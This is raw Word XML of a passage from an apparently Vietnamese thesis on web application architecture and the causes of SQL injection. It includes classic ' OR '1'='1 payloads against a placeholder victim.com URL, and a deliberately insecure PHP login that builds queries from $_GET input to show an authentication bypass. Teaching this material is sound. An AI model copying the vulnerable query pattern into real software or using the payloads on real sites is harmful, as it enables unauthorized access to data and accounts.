        </w:rPr>
        <w:t>nhiều loại hệ quản trị CSDL khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77E5C8A0" wp14:editId="454E9FEE">
            <wp:extent cx="5972175" cy="2107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972175" cy="210756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10" w:name="_Toc459819429"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Mô hình ứng dụng 4-lớp.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Pr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, làm cho mã nguồn ứng dụng dễ đọc hơn, cũng như dễ dàng tái sử dụng. Phương pháp này cũng loại bỏ các điểm yếu duy nhất của ứng dụng. Hiện nay, mô hình 3-lớp và 4-lớp đang rất phổ biến trên Internet. Tuy nhiên, như đã nói mô hình n-lớp rất linh hoạt và sẽ cung cấp vô số cách để chia tách và triển khai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="000A795D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc459822487"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Các ứng dụng web ngày càng trở nên phức tạp hơn. Phạm vi cũng mở rộng từ Internet đến nội bộ, từ các hệ thống thương mại điện tử đến các hệ thống đối tác, hệ thống quản lý. Sự đa dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> các hệ thống, sự nhạy cảm của các dữ liệu trở nên quan trọng với các doanh nghiệp. Các ứng dụng web cũng vô cùng đa dạng và biến đổi trong các dòng mã nguồn, càng nhiều tính năng càng làm tăng khả năng mắc lỗi của ứng dụng. Ngoài ra, sự phát triển của ngành An toàn thông tin (ATTT), hacker ngày càng tập trung vào việc khai thác, chiếm quyền điều khiển các hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công SQL injection là một kiểu tấn công mà câu lệnh truy vấn SQL được tạo thành từ đầu vào phía </w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>người</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> dùng, sau đó chuyển tới máy chủ SQL phía back-end để phân tích và thực thi. Bất kỳ thủ tục để xây dựng mệnh đề truy vấn SQL cũng có khả năng mắc lỗi, giống như sự đa dạng trong các phương pháp lập trình. Một hình thức cơ bản của SQL injection là chèn trực tiếp đoạn mã vào tham số (parameter) được ghép nối với câu truy vấn SQL và thực thi. Một dạng khác ít trực tiếp mà mã tấn công sẽ được tiêm (inject) vào trong một bảng, khi chuỗi này được lấy ra và ghép vào một câu truy vấn SQL động, nó sẽ được thực thi. Khi mà ứng dụng web không thực hiện tiền xử lý – sanitize đầu vào, thành phần sẽ được đưa vào câu truy vấn SQL động, kẻ tấn công sẽ tạo được câu lệnh SQL mong muốn. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="003633C3" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Để minh họ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B" w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> quay lại với ví dụ cửa hàng trực tuyến, cho phép hiển thị các sản phẩm có giá nhỏ hơn 100$:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="003633C3" w:rsidRDefault="001E10B4" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidR="003F7098" w:rsidRPr="003633C3">
          <w:t>http://www.victim.com/products.php?val=100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003F7098" w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="003633C3" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lầ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B" w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">n này </w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B" w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiến hành</w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> thêm câu lệnh SQL bằng cách thêm vào tham số val đoạn mã: ‘OR ‘1’=‘1. URL sẽ thành:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://www.victim.com/products.php?val=100’ OR ‘1’=‘1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mã PHP sẽ thực thi và trả về tất cả các sản phầm, không liên quan đến giá của nó. Bở</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>i vì trong ví dụ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã thay đổi logic của câu truy vấn SQL, khi nối thêm toán hạng OR, điều đó làm cho câu truy vấn luôn trả về True (vì thật sự 1 luôn bằng 1). Câu lệnh sau sẽ được sinh ra thực thi:</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xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00876FFE">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w: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FROM ProductsTbl</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WHERE Price &lt; ‘100.00’ OR ‘1’ = ‘1’</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ORDER BY ProductDescription;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>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rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong ví dụ trên, </w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>luận văn đã trình bày</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> cách kẻ tấn công tạo ra câu lệnh câu lệnh truy vấn SQL động từ đầu vào không được kiểm tra, từ đó thực thi các hành vi phía </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> không lường trước được.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rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="001E10B4" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.victim.com/cms/login.php?username=foo&amp;password=bar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ứng dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> yêu cầu cung cấp một tên người dùng và mật khẩu hợp lệ trước khi có thể truy cập vào các chức năng của nó. Truy cập các URL trước sẽ cho kết quả trong các lỗi “Incorrect username or password, please try again.”. Dưới đây là các mã cho file login.ph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connect to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query = “SELECT userid FROM CMSUsers WHERE user = ‘$_GET[“user”]’ ”.</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AND password = ‘$_GET[“passwor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result = mysql_query($query);</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check to see how many rows were returned from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rowcount = mysql_num_rows($resul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if a row is returned then the credentials must be valid, so</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forward the user to the admin pages</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if ($rowcount ! = 0){header(“Location: admin.php”);}</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if a row is not returned then the credentials must be invali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else {die(‘Incorrect username or password, please try again.’)}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>File login.php tự động tạo ra một câu lệnh SQL sẽ trả về một bản ghi mà nếu một tên truy nhập và mật khẩu hợp lệ được nhập vào. Các truy vấn sẽ trả userid tương ứng cho người sử dụng nếu giá trị user và password phù hợp với một giá trị được lưu trữ tương ứng trong bảng CMSUser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876FFE" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00876FFE">
              <w:t>SELECT userid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="00876FFE" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00876FFE">
              <w:t>FROM CMSUsers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00876FFE">
              <w:t>WHERE user = ‘foo’ AND password = ‘bar’;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vấn đề là trong đoạn mã trên, lập trình viên (LTV) tin rằng số lượng bản ghi trả về chỉ có thể là 0 hoặc 1. Trong ví dụ trướ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đã</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> trình bày về việc</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> inject để kết quả trả về luôn là TRUE. Nếu tiếp tục sử dụng lạ</w:t>
      </w:r>
      <w:r w:rsidR="005E7228">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">i, kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể làm sai logic của phần xác thực. Bằng cách thêm ‘OR ‘1’=’1 vào sau URL, đoạn script PHP trong lần </w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ trả về tất cả user trong bảng CMSUsers. URL trông như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="003633C3" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.victim.com/cms/login.php?username=foo&amp;password=bar’ OR ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="003633C3" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tất cả các userids được trả về bởi vì logic của câu truy vấn</w:t>
      </w:r>
      <w:r w:rsidR="005E7228" w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị đã thay đổi</w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Dưới đây là các truy vấn đã được xây dựng và thực hiệ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userid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>FROM CMSUsers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>WHERE user = ‘foo’ AND password = ‘password’ OR ‘1’ = ‘1’;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Logic của ứng dụng có nghĩa là nếu CSDL trả về nhiều hơn 1 bản ghi, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã nhập thông tin đăng nhập chính xác và có quyền truy cập vào file admin,php được bảo vệ. Sử dụng kỹ thuật khai thác này, thông thường sẽ được đăng nhập như là user </w:t>
      </w:r>
      <w:r w:rsidRPr="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>đầu</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiên trong bảng CMSUsers. Bằng việc khai thác lỗ hổng SQL injection đã phá vỡ cơ chế xác thực của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00945280">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc459822488"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nguyên nhân của lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL là ngôn ngữ chuẩn để truy cập vào các hệ quản trị CSDL: Microsoft SQL Server, Oracle, MySQL, Sybase, và Informix… Hầu hết các ứng dụng Web cần phải tương tác với một CSDL, và hầu hết các ngôn ngữ lập trình ứng dụng web, như ASP, C #, .NET, Java và PHP, cung cấp cách chương trình kết nối với một cơ sở dữ liệu và nó. Lỗ hổng SQL injection xảy ra khi các </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  ứng dụng Web không đảm bảo các giá trị nhận được từ người dùng (Web form, cookie, input parameter…) được kiểm tra chặt chẽ trước khi truyền vào câu truy vấn SQL và thực hiện trên máy chủ CSDL. Nếu một kẻ tấn công có thể kiểm soát đầu vào đó và thay đổi, những kẻ tấn công có thể thực thi câu lệnh SQL trên máy chủ CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Mỗi ngôn ngữ lập trình cung cấp một số cách khác nhau để xây dựng và thực thi câu lệnh SQL, và các </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thường sử dụng kết hợp của các phương pháp khác nhau. Có rất nhiều trang web cung cấp các hướng dẫn và các ví dụ để giúp các LTV giải quyết vấn đề thông thường, và thường các ví dụ này không an </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
